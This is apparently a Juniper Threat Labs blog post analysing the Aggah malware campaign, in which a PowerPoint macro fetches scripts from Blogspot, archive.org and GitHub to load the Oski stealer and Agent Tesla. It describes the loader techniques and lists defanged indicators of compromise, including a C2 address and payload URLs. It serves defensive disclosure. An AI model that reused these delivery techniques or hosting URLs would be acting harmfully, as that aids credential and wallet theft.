1/7 September 8, 2021 Aggah Malware Campaign Expands to Zendesk and GitHub to Host Its Malware blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware Juniper Threat Labs has detected a new development in the Aggah malware campaign. Previously, Aggah was known to be using legitimate infrastructures like BlogSpot, WordPress and Pastebin to host its malware. Recently, we discovered an ongoing campaign where Aggah threat actors host their malware using Zendesk attachments and GitHub. This campaign delivers several types of malware that are focused on stealing sensitive information, such as usernames and passwords, credit card information stored in browsers and crypto wallets. We detected a malicious Microsoft PowerPoint sample, ed70f584de47480ee706e2f6ee65db591e00a114843fa53c1171b69d43336ffe , which was downloaded from Zendesk’s own infrastructure as an attachment: http://p17[.]zdusercontent[.]com/attachment/9061705/eyckz3zuedoivxtp0i629aoxe The PowerPoint document contains a malicious macro file that connects to a shortened bitly.com URL which expands to https://mujhepyaslagihaimujhepanipilao[.]blogspot[.]com/p/mark2html in order download and execute a malicious Script via mshta.exe. https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware 2/7 Fig.1. The VB script in .ppt executes another script from bitly.com using mshta. Fig.2. Bitly url expands to https://mujhepyaslagihaimujhepanipilao[.]blogspot[.]com/p/mark2htmlThe script, mark2.html , hosted on mujhepyaslagihaimujhepanipilao[.]blogspot[.]com , performs a series of operations, such as creating a Run entry in the registry to execute a PowerShell script, download and execute another script using scheduled task and use WMI in the registry Run key to download and execute another script. 3/7 Fig.3. Series of operations done by mark2.html The code shown in Figure 3 downloads from the following links and executes them. https://ia801405us[.]archive[.]org/11/items/pg_20210716/blessed.txt https://randikhanaekminar[.]blogspot[.]com/p/elevatednew1.html https://backbones1234511a[.]blogspot[.]com/p/elevatednew1backup.html https://startthepartyup[.]blogspot.com/p/backbone15.html https://ghostbackbone123[.]blogspot.com/p/ghostbackup14.html Blessed.txt The PowerShell script is hosted on archive.org as blessed.txt . The PowerShell loads a stealer malware, known as Oski. The Oski malware is included in the PowerShell script as a hex-encoded string. It uses a technique known as Signed Binary execution via RegSvcs.exe and .NET Assembly.Load to load this binary as an added layer of protection since it’s not saved to the disk and only stays in memory. http://archive.org/ 4/7 Fig. 4 Blessed.txt is a PowerShell script that contains a Windows executable which it loads via RegSvcs.exe Oski was first seen in 2019. Today, it’s sold in Russian hacking forums for $70-$100. Oski malware’s capabilities include: Stealing cryptocurrency wallets Stealing sensitive information stored in browsers such as credit card data, autofill data and cookies Stealing credentials from various applications such as FTP, VPN and web browsers Capturing screenshots Collecting system information Downloading and installing additional malware 5/7 Fig . 5 Oski code that steals crypto and browser data Oski connects to the following C2 server: 103.153.76.164 After it collects and exfiltrates the data, it will delete traces of itself in the system. Elevatednew1.html One other routine that we have listed above in Fig. 3 includes creating a scheduled task to download and execute another malicious script hosted on https://randikhanaekminar[.]blogspot[.]com/p/elevatednew1.html . This malicious script loads another PowerShell script named blessed.txt . This time, the script is hosted in GitHub as follows: https://raw[.]githubusercontent[.]com/manasshole/newone/main/blessed.txt 6/7 Fig. 6 Script code inside elevatednew1.html executes a PowerShell hosted in GitHub.com The malware that it tries to install is Agent Tesla, a .NET keylogger and RAT that logs keystrokes and the host’s clipboard content. The other malicious scripts backbone15.html and ghostbackup14.html are no longer available for download, while elevatednew1backup.html is the same as elevatednew1.html Before publication of this blog, we have contacted Zendesk and Github and they quickly responded to disable the hosted malware. Conclusion The threat actors’ primary goal is to steal sensitive information such as usernames and passwords, credit cards and crypto wallets. On the surface, this may seem to have a low impact in comparison with ransomware operations targeting enterprises. However, the Aggah threat actors’ method of using legitimate infrastructure is worrisome. As a defender, one way to disrupt malicious activity is to detect their infrastructure. This is usually effective as it’s not that easy to change infrastructures. As we have observed and noted, threat actors using GitHub, Archive.org, Zendesk, GitHub, Pastebin and Google Drive are not going away anytime soon and we expect their malicious efforts to continue. For instance, Juniper Threat Labs has also seen a growing usage of Zendesk to host malware, which may warrant its own blog in the future. In this particular case, Juniper Networks’ Advanced Threat Prevention (ATP) solution detects the Aggah malware file as follows: https://www.juniper.net/us/en/products/security/advanced-threat-prevention.html 7/7 IOC ed70f584de47480ee706e2f6ee65db591e00a114843fa53c1171b69d43336ffe 103[.]153[.]76[.]164 https://raw[.]githubusercontent[.]com/manasshole/newone/main/blessed.txt http://p17[.]zdusercontent[.]com/attachment/9061705/eyckz3zuedoivxtp0i629aoxe https://ia801405us[.]archive[.]org/11/items/pg_20210716/blessed.txt https://randikhanaekminar[.]blogspot[.]com/p/elevatednew1.html https://backbones1234511a[.]blogspot[.]com/p/elevatednew1backup.html https://startthepartyup[.]blogspot.com/p/backbone15.html https://ghostbackbone123[.]blogspot.com/p/ghostbackup14.html